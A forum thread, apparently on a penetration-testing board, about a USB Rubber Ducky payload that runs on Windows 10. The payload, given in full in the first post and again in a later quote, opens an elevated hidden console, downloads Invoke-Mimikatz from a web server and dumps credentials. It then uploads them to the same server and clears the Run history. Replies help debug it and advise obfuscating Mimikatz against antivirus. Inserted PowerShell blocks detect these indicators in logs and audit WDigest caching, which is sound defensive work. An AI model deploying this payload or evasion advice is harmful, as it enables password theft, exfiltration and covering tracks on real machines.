Posted

Greetings,

I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.

I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):

DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER


I can access both files from the targeted system with my browser, so the web server is working fine. I am listening with netcat ('nc -l -p 80') but it never receives the data. What am I doing wrong here?
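From the defender's side, the payload above leaves a very recognisable trail in PowerShell Script Block Logging (event 4104) and in process command lines: a WebClient download cradle piped into IEX, an Invoke-Mimikatz call, a WebClient upload, and a RunMRU wipe. The following script is an added example written for this thread, not code from the original post or from any project it mentions; it scores a piece of script text against those indicators and, optionally, runs the same check over recent 4104 events. The indicator names, the regexes and the sample blocks (which reuse the thread's own 192.xxx.x.xx placeholder) are constructed for the example; it assumes Script Block Logging is enabled on the host.

```powershell
# Added example (not from the thread): flag script text that matches the
# download / dump / upload / history-wipe sequence shown in the payload.
# Indicator names and regexes are constructed for this example.
$Indicators = [ordered]@{
    DownloadCradle   = 'New-Object\s+(System\.)?Net\.WebClient\)?\.DownloadString'
    InvokeExpression = '\bIEX\b|Invoke-Expression'
    MimikatzModule   = 'Invoke-Mimikatz|DumpCreds|sekurlsa'
    DataUpload       = 'Net\.WebClient\)?\.Upload(String|File|Data)'
    RunMruWipe       = 'Explorer\\RunMRU'
    ConsoleHiding    = 'mode\s+con:\s*cols=\d+\s+lines=\d+'
}

function Test-ScriptBlockText {
    # Works on a 4104 script block, a 4688/Sysmon-1 command line, or any text.
    param([Parameter(Mandatory)][string]$Text)
    $hits = @(foreach ($name in $Indicators.Keys) {
        if ($Text -match $Indicators[$name]) { $name }
    })
    $snippet = if ($Text.Length -gt 70) { $Text.Substring(0, 70) + '...' } else { $Text }
    [pscustomobject]@{
        HitCount = $hits.Count
        Flagged  = ($hits.Count -ge 2)   # two or more indicators together is the strong signal
        Hits     = ($hits -join ', ')
        Snippet  = $snippet
    }
}

function Get-FlaggedScriptBlocks {
    # Live mode: scan the most recent 4104 events on this host.
    # The event Message wraps the script text in boilerplate; matching on it is fine here.
    param([int]$MaxEvents = 500)
    Get-WinEvent -FilterHashtable @{ LogName = 'Microsoft-Windows-PowerShell/Operational'; Id = 4104 } `
                 -MaxEvents $MaxEvents -ErrorAction Stop |
        ForEach-Object {
            $result = Test-ScriptBlockText -Text $_.Message
            if ($result.Flagged) {
                $result | Add-Member -NotePropertyName TimeCreated -NotePropertyValue $_.TimeCreated -PassThru
            }
        }
}

# Constructed sample blocks: the thread's two PowerShell one-liners plus a benign command.
$SampleBlocks = @(
    'IEX (New-Object Net.WebClient).DownloadString(''192.xxx.x.xx/im.ps1''); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString(''192.xxx.x.xx/rx.php'', $output)',
    'Remove-ItemProperty -Path ''HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU'' -Name ''*'' -ErrorAction SilentlyContinue',
    'Get-ChildItem C:\Users -Recurse | Measure-Object'
)

$SampleBlocks | ForEach-Object { Test-ScriptBlockText -Text $_ } |
    Format-Table HitCount, Flagged, Hits, Snippet -AutoSize
```

Run as-is, the first sample scores four indicators and is flagged, the RunMRU wipe scores one (worth correlating with the block that preceded it), and the benign command scores zero. In a real deployment the same regex set belongs in the SIEM rule for 4104 and 4688 rather than in an ad-hoc script, and the `GUI r` / `Start-Process cmd -Verb runAs` step at the top of the payload is visible as a UAC prompt followed by an elevated cmd.exe spawned from explorer.exe.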

  • 2 weeks later...
Posted

Why would you use netcat if you use the rx.php script?
Just look in the web directory where rx.php is located; all the files created by the script should be there.
Tip: check the Apache error log. In my case the user Apache runs as (www-data) didn't have write permissions in this folder, so rx.php couldn't create files.

  • 4 weeks later...
  • 1 month later...
Posted
On 1/15/2017 at 1:30 PM, rpc72 said:

Starting with Windows 8, passwords are no longer stored in memory in the same way that can be reversed.

Not true, mimikatz still works in Win10, I just tested.

Posted
17 hours ago, L07TB0Y said:

Not true, mimikatz still works in Win10, I just tested.

Yeah but you only get plaintext passwords if you have set a specific registry key (on Windows 8+).
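The "specific registry key" referred to above is the WDigest provider's UseLogonCredential value: when it is 1, LSASS keeps a reversible copy of the logon password that tools like the one in this thread read back. Windows 8.1 and Server 2012 R2 turned that caching off by default, and the same opt-out was shipped to earlier versions as update KB2871997, where the value must be set to 0 explicitly. The audit below is an added example for this thread, not code from the original posts or any project they mention; it reports whether plaintext caching is effectively on for the host's OS generation and offers a function to turn it off. The function names are constructed; the registry path and value name are the real ones.

```powershell
# Added example (not from the thread): audit and, if wanted, disable
# WDigest plaintext credential caching. Function names are constructed.
$WDigestKey = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'

function Get-WDigestStatus {
    $value = (Get-ItemProperty -Path $WDigestKey -Name UseLogonCredential -ErrorAction SilentlyContinue).UseLogonCredential
    $osVersion = [version](Get-CimInstance Win32_OperatingSystem).Version

    # 6.3 = Windows 8.1 / Server 2012 R2. From there on, caching is off unless
    # the value is explicitly 1. On older builds with KB2871997, caching stays
    # on unless the value is explicitly 0 (an absent value still means "on").
    $offByDefault = $osVersion -ge [version]'6.3'
    $cachingOn = if ($null -eq $value) { -not $offByDefault } else { $value -eq 1 }

    [pscustomobject]@{
        OSVersion          = $osVersion
        UseLogonCredential = if ($null -eq $value) { '(not set)' } else { $value }
        PlaintextCaching   = if ($cachingOn) { 'ENABLED' } else { 'disabled' }
        Recommendation     = if ($cachingOn) { 'Set UseLogonCredential to 0 (Disable-WDigestCaching)' } else { 'OK' }
    }
}

function Disable-WDigestCaching {
    # Supports -WhatIf so the change can be previewed first. Needs administrator rights.
    [CmdletBinding(SupportsShouldProcess)]
    param()
    if ($PSCmdlet.ShouldProcess($WDigestKey, 'Set UseLogonCredential (DWORD) = 0')) {
        New-ItemProperty -Path $WDigestKey -Name UseLogonCredential -PropertyType DWord -Value 0 -Force | Out-Null
        Write-Verbose 'UseLogonCredential set to 0; applies to logons from now on.'
    }
}

Get-WDigestStatus | Format-List
# To enforce: Disable-WDigestCaching -WhatIf   (then without -WhatIf)
```

Two caveats for the check: the setting only governs credentials cached for new logons, so sessions established while caching was on keep their cached copy until logoff or reboot, and an attacker who already has local administrator rights can simply flip the value back to 1. The value is therefore also worth monitoring (Sysmon event 13, registry value set, on that path), and Credential Guard is the stronger mitigation where the hardware supports it.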

  • 2 weeks later...
  • 3 years later...
Posted
On 12/10/2016 at 4:09 PM, Mr.X said:

Greetings,

I have been toying around with my Rubber Ducky for a couple days now and I have been doing some tests on Windows 10 64bit mostly. I am currently running twinduck version: c_duck_v2_S002. I was ideally looking for a payload that would use mimikatz to extract the windows password from the current user and save it onto the ducky itself but none have worked yet.

I also tried out the web server method with a local hosted apache2 web server(replacing the x's with my actual local hosted address):

DELAY 1000
REM Open an admin command prompt 
GUI r
DELAY 500
STRING powershell Start-Process cmd -Verb runAs
ENTER
DELAY 2000
ALT y
DELAY 1000
REM Obfuscate the command prompt
STRING mode con:cols=18 lines=1
ENTER
STRING color FE
ENTER
REM Download and execute Invoke Mimikatz then upload the results
STRING powershell "IEX (New-Object Net.WebClient).DownloadString('192.xxx.x.xx/im.ps1'); $output = Invoke-Mimikatz -DumpCreds; (New-Object Net.WebClient).UploadString('192.xxx.x.xx/rx.php', $output)"
ENTER
DELAY 15000
REM Clear the Run history and exit
STRING powershell "Remove-ItemProperty -Path 'HKCU:\Software\Microsoft\Windows\CurrentVersion\Explorer\RunMRU' -Name '*' -ErrorAction SilentlyContinue"
ENTER
STRING exit
ENTER


I can access both files from the targeted system with my browser, so the web server is working fine. I am listening with netcat ('nc -l -p 80') but it never receives the data. What am I doing wrong here?

Does mimikatz work if there's an anti-virus installed on the computer, or does it still work?

Posted
On 12/8/2020 at 8:10 AM, ehsan123 said:

Does mimikatz work if there's an anti-virus installed on the computer, or does it still work?

Probably not by default. You'd have to obfuscate it first.
